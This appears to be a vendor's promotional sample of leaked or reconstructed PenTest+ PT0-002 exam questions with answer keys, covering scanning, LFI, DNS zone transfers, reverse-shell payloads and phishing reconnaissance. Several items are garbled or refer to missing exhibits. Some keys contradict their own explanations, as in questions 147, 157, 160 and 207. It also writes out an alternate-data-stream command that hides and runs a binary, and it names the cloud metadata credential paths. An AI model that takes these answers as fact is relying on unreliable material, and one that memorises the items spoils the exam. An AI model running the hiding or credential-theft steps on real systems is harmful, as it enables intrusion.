Local File Inclusion (LFI) is a web vulnerability that allows an attacker to include files on a server through the web browser. This can expose sensitive information
or lead to remote code execution.
Some possible next steps that a penetration tester can try after exploiting an LFI vulnerability are:
Log poisoning: This involves injecting malicious code into the web server’s log files and then including them via LFI to execute the code34.
PHP wrappers: These are special streams that can be used to manipulate files or data via LFI. For example, php://input can be used to pass arbitrary data to
an LFI script, or php://filter can be used to encode or decode files5.

NEW QUESTION 130

A penetration tester is conducting an Nmap scan and wants to scan for ports without establishing a connection. The tester also wants to find version data
information for services running on Projects. Which of the following Nmap commands should the tester use?

A. ..nmap -sU -sV -T4 -F target.company.com

B. ..nmap -sS -sV -F target.company.com
C. ..nmap -sT -v -T5 target.company.com
D. ..nmap -sX -sC target.company.com

Answer: B

Explanation:
The Nmap command that the tester should use to scan for ports without establishing a connection and to find version data information for services running on open
ports is nmap -sS -sV -F target.company.com. This command has the following options:
-sS performs a TCP SYN scan, which is a scan technique that sends TCP packets with the SYN flag set to the target ports and analyzes the responses. A TCP
SYN scan does not establish a full TCP connection, as it only completes the first step of the three-way handshake. A TCP SYN scan can stealthily scan for open
ports without alerting the target system or application.
-sV performs version detection, which is a feature that probes open ports to determine the service and version information of the applications running on them.
Version detection can provide useful information for identifying vulnerabilities or exploits that affect specific versions of services or applications.
-F performs a fast scan, which is a scan option that only scans the 100 most common ports according to the nmap-services file. A fast scan can speed up the
scan process by avoiding scanning less likely or less interesting ports.
target.company.com specifies the domain name of the target system or network to be scanned.
The other options are not valid Nmap commands that meet the requirements of the question. Option A performs a UDP scan (-sU), which is a scan technique that
sends UDP packets to the target ports and analyzes the responses. A UDP scan can scan for open ports that use UDP protocol, such as DNS, SNMP, or DHCP.
However, a UDP scan does establish a connection with the target system or application, unlike a TCP SYN scan. Option C performs a TCP connect scan (-sT),
which is a scan technique that sends TCP packets with the SYN flag set to the target ports and completes the three-way handshake with an ACK packet if a
SYN/ACK packet is received. A TCP connect scan can scan for open ports that use TCP protocol, such as HTTP, FTP, or SSH. However, a TCP connect scan
does establish a full TCP connection with the target system or application, unlike a TCP SYN scan. Option D performs an Xmas scan (-sX), which is a scan
technique that sends TCP packets with the FIN, PSH, and URG flags set to the target ports and analyzes the responses. An Xmas scan can stealthily scan for
open ports without alerting the target system or application, similar to a TCP SYN scan. However, option D does not perform version detection (-sV), which is one
of the requirements of the question.

NEW QUESTION 132

A penetration tester receives the following results from an Nmap scan:

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

Which of the following OSs is the target MOST likely running?

A. CentOS
B. Arch Linux
C. Windows Server
D. Ubuntu

Answer: C

NEW QUESTION 133

During a penetration tester found a web component with no authentication requirements. The web component also allows file uploads and is hosted on one of the
target public web the following actions should the penetration tester perform next?

A. Continue the assessment and mark the finding as critical.

B. Attempting to remediate the issue temporally.
C. Notify the primary contact immediately.
D. Shutting down the web server until the assessment is finished

Answer: C

Explanation:
The penetration tester should notify the primary contact immediately, as this is a serious security issue that may compromise the confidentiality, integrity, and
availability of the web server and its data. A web component with no authentication requirements and file upload capabilities can allow an attacker to upload
malicious files, such as web shells, backdoors, or malware, to the web server and gain remote access or execute arbitrary commands on the web server. This can
lead to further attacks, such as data theft, data corruption, privilege escalation, lateral movement, or denial of service. The penetration tester should inform the
primary contact of the issue and its potential impact, and provide recommendations for remediation, such as implementing authentication mechanisms, restricting
file upload types and sizes, or scanning uploaded files for malware. The other options are not appropriate actions for the penetration tester at this stage.
Continuing the assessment and marking the finding as critical would delay the notification and remediation of the issue, which may increase the risk of exploitation
by other attackers. Attempting to remediate the issue temporarily would interfere with the normal operation of the web server and may cause unintended
consequences or damage. Shutting down the web server until the assessment is finished would disrupt the availability of the web server and its services, and may
violate the scope or agreement of the assessment.

NEW QUESTION 134

A penetration tester completed an assessment, removed all artifacts and accounts created during the test, and presented the findings to the client. Which of the
following happens NEXT?

A. The penetration tester conducts a retest.

B. The penetration tester deletes all scripts from the client machines.
C. The client applies patches to the systems.
D. The client clears system logs generated during the test.

Answer: C

NEW QUESTION 138

A penetration tester runs the following command: l.comptia.local axfr comptia.local
which of the following types of information would be provided?

A. The DNSSEC certificate and CA

B. The DHCP scopes and ranges used on the network
C. The hostnames and IP addresses of internal systems
D. The OS and version of the DNS server

Answer: C

Explanation:
The command dig @ns1.comptia.local axfr comptia.local is a command that performs a DNS zone transfer, which is a process of copying the entire DNS database
or zone file from a primary DNS server to a secondary DNS server. A DNS zone file contains records that map domain names to IP addresses and other
information, such as mail servers, name servers, or aliases. A DNS zone transfer can provide useful information for enumeration, such as the hostnames and IP
addresses of internal systems, which can help identify potential targets or vulnerabilities. A DNS zone transfer can be performed by using tools such as dig, which
is a tool that can query DNS servers and obtain information about domain names, such as IP addresses, mail servers, name servers, or other records1. The other
options are not types of information that would be provided by a DNS zone transfer. The DNSSEC certificate and CA are not part of the DNS zone file, but rather
part of the DNSSEC protocol, which is an extension of the DNS protocol that provides authentication and integrity for DNS data. The DHCP scopes and ranges
used on the network are not part of the DNS zone file, but rather part of the DHCP protocol, which is a protocol that assigns dynamic IP addresses and other
configuration parameters to devices on a network. The OS and version of the DNS server are not part of the DNS zone file, but rather part of the OS fingerprinting
technique, which is a technique that identifies the OS and version of a remote system by analyzing its responses to network probes.

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

NEW QUESTION 143

A penetration tester conducted a vulnerability scan against a client’s critical servers and found the following:

Which of the following would be a recommendation for remediation?

A. Deploy a user training program

B. Implement a patch management plan
C. Utilize the secure software development life cycle
D. Configure access controls on each of the servers

Answer: B

NEW QUESTION 147

A penetration tester learned that when users request password resets, help desk analysts change users' passwords to 123change. The penetration tester decides
to brute force an internet-facing webmail to check which users are still using the temporary password. The tester configures the brute-force tool to test usernames
found on a text file and the... Which of the following techniques is the penetration tester using?

A. Password brute force attack

B. SQL injection
C. Password spraying
D. Kerberoasting

Answer: A

Explanation:
The penetration tester is using a password brute force attack, which is a type of password guessing attack that involves trying many possible combinations of
passwords against a single username or account. A password brute force attack can be effective when the password is known to be weak, simple, or predictable,
such as a default or temporary password. In this case, the penetration tester knows that the help desk analysts change users’ passwords to 123change when they
request password resets, and decides to brute force the webmail with this password and a list of usernames. A password brute force attack can be done by using
tools such as Hydra, which can perform parallelized login attacks against various protocols and services1. The other options are not techniques that the
penetration tester is using. SQL injection is a type of attack that exploits a vulnerability in a web application that allows an attacker to execute malicious SQL
statements on a database server. Password spraying is a type of password guessing attack that involves trying one or a few common passwords against many
usernames or accounts. Kerberoasting is a type of attack that exploits a vulnerability in the Kerberos authentication protocol that allows an attacker to request and
crack service tickets for service accounts with weak passwords.

NEW QUESTION 150

A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty
percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations
would BEST address this situation?

A. Implement a recurring cybersecurity awareness education program for all users.

B. Implement multifactor authentication on all corporate applications.
C. Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.
D. Implement an email security gateway to block spam and malware from email communications.

Answer: A

Explanation:
The simulated phishing attack showed that most of the employees were not able to recognize or avoid a common social engineering technique that could
compromise their corporate credentials and expose sensitive data or systems. The best way to address this situation is to implement a recurring cybersecurity
awareness education program for all users that covers topics such as phishing, password security, data protection, and incident reporting. This will help raise the
level of security awareness and reduce the risk of falling victim to phishing attacks in the future. The other options are not as effective or feasible as educating
users about phishing prevention techniques.

NEW QUESTION 151

A penetration tester has been given eight business hours to gain access to a client’s financial system. Which of the following techniques will have the highest
likelihood of success?

A. Attempting to tailgate an employee going into the client's workplace

B. Dropping a malicious USB key with the company’s logo in the parking lot
C. Using a brute-force attack against the external perimeter to gain a foothold
D. Performing spear phishing against employees by posing as senior management

Answer: D

NEW QUESTION 153

A consultant just performed a SYN scan of all the open ports on a remote host and now needs to remotely identify the type of services that are running on the host.
Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this task?

A. tcpdump
B. Snort
C. Nmap

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

D. Netstat
E. Fuzzer

Answer: C

NEW QUESTION 157

A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose
two.)

A. Open-source research
B. A ping sweep
C. Traffic sniffing
D. Port knocking
E. A vulnerability scan
F. An Nmap scan

Answer: AC

Explanation:
Open-source research and traffic sniffing are two activities that have a minimal chance of detection, as they do not involve sending any packets or requests to the
target network or system. Open-source research is the process of gathering information from publicly available sources, such as websites, social media, blogs,
forums, etc. Traffic sniffing is the process of capturing and analyzing network packets that are transmitted over a shared medium, such as wireless or Ethernet.

NEW QUESTION 160

A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a shell. However, a connection was not established, and no errors
were shown on the payload execution. The penetration tester suspected that a network device, like an IPS or next-generation firewall, was dropping the
connection. Which of the following payloads are MOST likely to establish a shell successfully?

A. windows/x64/meterpreter/reverse_tcp
B. windows/x64/meterpreter/reverse_http
C. windows/x64/shell_reverse_tcp
D. windows/x64/powershell_reverse_tcp
E. windows/x64/meterpreter/reverse_https

Answer: B

Explanation:
These two payloads are most likely to establish a shell successfully because they use HTTP or HTTPS protocols, which are commonly allowed by network devices
and can bypass firewall rules or IPS signatures. The other payloads use TCP protocols, which are more likely to be blocked or detected by network devices.

NEW QUESTION 163

A penetration tester writes the following script:

Which of the following objectives is the tester attempting to achieve?

A. Determine active hosts on the network.

B. Set the TTL of ping packets for stealth.
C. Fill the ARP table of the networked devices.
D. Scan the system on the most used ports.

Answer: A

Explanation:
The tester is attempting to determine active hosts on the network by writing a script that pings a range of IP addresses. Ping is a network utility that sends ICMP
echo request packets to a host and waits for ICMP echo reply packets. Ping can be used to test whether a host is reachable or not by measuring its response time.
The script uses a for loop to iterate over a range of IP addresses from 192.168.1.1 to 192.168.1.254 and pings each one using the ping command with -c 1 option,
which specifies one packet per address.

NEW QUESTION 165

A penetration tester needs to perform a vulnerability scan against a web server. Which of the following tools is the tester MOST likely to choose?

A. Nmap
B. Nikto
C. Cain and Abel
D. Ethercap

Answer: B

Explanation:
https://hackertarget.com/nikto-website-scanner/

NEW QUESTION 170

A consulting company is completing the ROE during scoping. Which of the following should be included in the ROE?

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

A. Cost ofthe assessment

B. Report distribution
C. Testing restrictions
D. Liability

Answer: B

NEW QUESTION 175

After compromising a system, a penetration tester wants more information in order to decide what actions to take next. The tester runs the following commands:

Which of the following attacks is the penetration tester most likely trying to perform?

A. Metadata service attack

B. Container escape techniques
C. Credential harvesting
D. Resource exhaustion

Answer: A

Explanation:
The penetration tester is most likely trying to perform a metadata service attack, which is an attack that exploits a vulnerability in the metadata service of a cloud
provider. The metadata service is a service that provides information about the cloud instance, such as its IP address, hostname, credentials, user data, or role
permissions. The metadata service can be accessed from within the cloud instance by using a special IP address, such as 169.254.169.254 for AWS, Azure, and
GCP. The commands that the penetration tester runs are curl commands, which are used to transfer data from or to a server. The curl commands are requesting
data from the metadata service IP address with different paths, such as /latest/meta-data/iam/security-credentials/ and /latest/user-data/. These paths can reveal
sensitive information about the cloud instance, such as its IAM role credentials or user data scripts. The penetration tester may use this information to escalate
privileges, access other resources, or perform other actions on the cloud environment. The other options are not likely attacks that the penetration tester is trying to
perform.

NEW QUESTION 178

Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:

A. devices produce more heat and consume more power.

B. devices are obsolete and are no longer available for replacement.
C. protocols are more difficult to understand.
D. devices may cause physical world effects.

Answer: D

Explanation:
"A significant issue identified by Wiberg is that using active network scanners, such as Nmap, presents a weakness when attempting port recognition or service
detection on SCADA devices. Wiberg states that active tools such as Nmap can use unusual TCP segment data to try and find available ports. Furthermore, they
can open a massive amount of connections with a specific SCADA device but then fail to close them gracefully." And since SCADA and ICS devices are designed
and implemented with little attention having been paid to the operational security of these devices and their ability to handle errors or unexpected events, the
presence idle open connections may result into errors that cannot be handled by the devices.

NEW QUESTION 180

A penetration tester joins the assessment team in the middle of the assessment. The client has asked the team, both verbally and in the scoping document, not to
test the production networks. However, the new tester is not aware of this request and proceeds to perform exploits in the production environment. Which of the
following would have MOST effectively prevented this misunderstanding?

A. Prohibiting exploitation in the production environment

B. Requiring all testers to review the scoping document carefully
C. Never assessing the production networks
D. Prohibiting testers from joining the team during the assessment

Answer: B

Explanation:
The scoping document is a document that defines the objectives, scope, limitations, deliverables, and expectations of a penetration testing engagement. It is an
essential document that guides the penetration testing process and ensures that both the tester and the client agree on the terms and conditions of the test.
Requiring all testers to review the scoping document carefully would have most effectively prevented this misunderstanding, as it would have informed the new
tester about the client’s request not to test the production networks. The other options are not effective or realistic ways to prevent this misunderstanding.

NEW QUESTION 182

Which of the following situations would MOST likely warrant revalidation of a previous security assessment?

A. After detection of a breach

B. After a merger or an acquisition
C. When an organization updates its network firewall configurations
D. When most of the vulnerabilities have been remediated

Answer: D

NEW QUESTION 183

A penetration tester, who is doing an assessment, discovers an administrator has been exfiltrating proprietary company information. The administrator offers to pay

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

the tester to keep quiet. Which of the following is the BEST action for the tester to take?

A. Check the scoping document to determine if exfiltration is within scope.

B. Stop the penetration test.
C. Escalate the issue.
D. Include the discovery and interaction in the daily report.

Answer: B

Explanation:
"Another reason to communicate with the customer is to let the customer know if something unexpected arises while doing the pentest, such as if a critical
vulnerability is found on a system, a new target system is found that is outside the scope of the penetration test targets, or a security breach is discovered when
doing the penetration test. You will need to discuss how to handle such discoveries and who to contact if those events occur. In case of such events, you typically
stop the pentest temporarily to discuss the issue with the customer, then resume once a resolution has been determined."

NEW QUESTION 185

A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call
create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

A. Alternate data streams

B. PowerShell modules
C. MP4 steganography
D. PsExec

Answer: A

Explanation:
Alternate data streams (ADS) are a feature of the NTFS file system that allows storing additional data in a file without affecting its size, name, or functionality. ADS
can be used to hide or embed data or executable code in a file, such as a specially crafted binary for later execution. ADS can be created or accessed using
various tool or commands, such as the command prompt, PowerShell, or Sysinternals12. For example, the following command can create an ADS named
secret.exe in a file named test.txt and run it using wmic.exe process call create function: type secret.exe > test.txt:secret.exe & wmic process call create "cmd.exe
/c test.txt:secret.exe"

NEW QUESTION 190

A penetration tester is conducting an unknown environment test and gathering additional information that can be used for later stages of an assessment. Which of
the following would most likely produce useful information for additional testing?

A. Searching for code repositories associated with a developer who previously worked for the target company code repositories associated with the
B. Searching for code repositories target company's organization
C. Searching for code repositories associated with the target company's organization
D. Searching for code repositories associated with a developer who previously worked for the target company

Answer: B

Explanation:
Code repositories are online platforms that store and manage source code and other files related to software development projects. Code repositories can contain
useful information for additional testing, such as application names, versions, features, functions, vulnerabilities, dependencies, credentials, comments, or
documentation. Searching for code repositories associated with the target company’s organization would most likely produce useful information for additional
testing, as it would reveal the software projects that the target company is working on or using, and potentially expose some weaknesses or flaws that can be
exploited. Code repositories can be searched by using tools such as GitHub, GitLab, Bitbucket, or SourceForge1. The other options are not as likely to produce
useful information for additional testing, as they are not directly related to the target company’s software development activities. Searching for code repositories
associated with a developer who previously worked for the target company may not yield any relevant or current information, as the developer may have deleted,
moved, or updated their code repositories after leaving the company.
Searching for code repositories associated with the target company’s competitors or customers may not yield any useful or accessible information, as they may
have different or unrelated software projects, or they may have restricted or protected their code repositories from public view.

NEW QUESTION 194

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character
combinations should be used on the first line of the script to accomplish this goal?

A. <#
B. <$
C. ##
D. #$
E. #!

Answer: E

NEW QUESTION 198

A penetration tester has been hired to perform a physical penetration test to gain access to a secure room within a client’s building. Exterior reconnaissance
identifies two entrances, a WiFi guest network, and multiple security cameras connected to the Internet.
Which of the following tools or techniques would BEST support additional reconnaissance?

A. Wardriving
B. Shodan
C. Recon-ng
D. Aircrack-ng

Answer: C

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

NEW QUESTION 203

A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the
website for vulnerabilities?

A. Comma
B. Double dash
C. Single quote
D. Semicolon

Answer: C

Explanation:
A single quote (') is a common character used to test for SQL injection vulnerabilities, which occur when user input is directly passed to a database query. A single
quote can terminate a string literal and allow an attacker to inject malicious SQL commands. For example, if the search form uses the query SELECT * FROM
products WHERE name LIKE ‘%user_input%’, then entering a single quote as user input would result in an error or unexpected behavior

NEW QUESTION 207

During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the
following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client’s cybersecurity tools?
(Choose two.)

A. Scraping social media sites

B. Using the WHOIS lookup tool
C. Crawling the client’s website
D. Phishing company employees
E. Utilizing DNS lookup tools
F. Conducting wardriving near the client facility

Answer: AC

Explanation:
Technical and billing addresses are usually posted on company websites and company social media sites for the their clients to access. The WHOIS lookup will
only avail info for the company registrant, an abuse email contact, etc but it may not contain details for billing addresses.

NEW QUESTION 210

A penetration tester found the following valid URL while doing a manual assessment of a web application: http://www.example.com/product.php?id=123987.
Which of the following automated tools would be best to use NEXT to try to identify a vulnerability in this
URL?

A. SQLmap
B. Nessus
C. Nikto
D. DirBuster

Answer: B

NEW QUESTION 213

In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company’s servers. Which of the
following actions would BEST enable the tester to perform phishing in a later stage of the assessment?

A. Test for RFC-defined protocol conformance.

B. Attempt to brute force authentication to the service.
C. Perform a reverse DNS query and match to the service banner.
D. Check for an open relay configuration.

Answer: D

Explanation:
SMTP is a protocol associated with mail servers. Therefore, for a penetration tester, an open relay configuration can be exploited to launch phishing attacks.

NEW QUESTION 217

A penetration tester is required to perform a vulnerability scan that reduces the likelihood of false positives and increases the true positives of the results. Which of
the following would MOST likely accomplish this goal?

A. Using OpenVAS in default mode

B. Using Nessus with credentials
C. Using Nmap as the root user
D. Using OWASP ZAP

Answer: B

Explanation:
Using credentials during a vulnerability scan allows the scanner to gather more detailed information about the target system, including installed software, patch
levels, and configuration settings. This helps to reduce the likelihood of false positives and increase the true positives of the results. Nessus is a popular
vulnerability scanner that supports credential-based scanning and can be used to accomplish this goal. OpenVAS and Nmap are also popular scanning tools, but
using default mode or running as the root user alone may not provide the necessary level of detail for accurate vulnerability identification. OWASP ZAP is a web
application scanner and may not be applicable for non-web-based targets.

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

NEW QUESTION 220

......

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

 Welcome to download the Newest 2passeasy PT0-002 dumps
https://www.2passeasy.com/dumps/PT0-002/ (278 New Questions)

THANKS FOR TRYING THE DEMO OF OUR PRODUCT

Visit Our Site to Purchase the Full Set of Actual PT0-002 Exam Questions With Answers.

We Also Provide Practice Exam Software That Simulates Real Exam Environment And Has Many Self-Assessment Features. Order the
PT0-002 Product From:

https://www.2passeasy.com/dumps/PT0-002/

Money Back Guarantee

PT0-002 Practice Exam Features:

* PT0-002 Questions and Answers Updated Frequently

* PT0-002 Practice Questions Verified by Expert Senior Certified Staff

* PT0-002 Most Realistic Questions that Guarantee you a Pass on Your FirstTry

* PT0-002 Practice Test Questions in Multiple Choice Formats and Updatesfor 1 Year

Passing Certification Exams Made Easy visit - https://www.2PassEasy.com

Powered by TCPDF (www.tcpdf.org)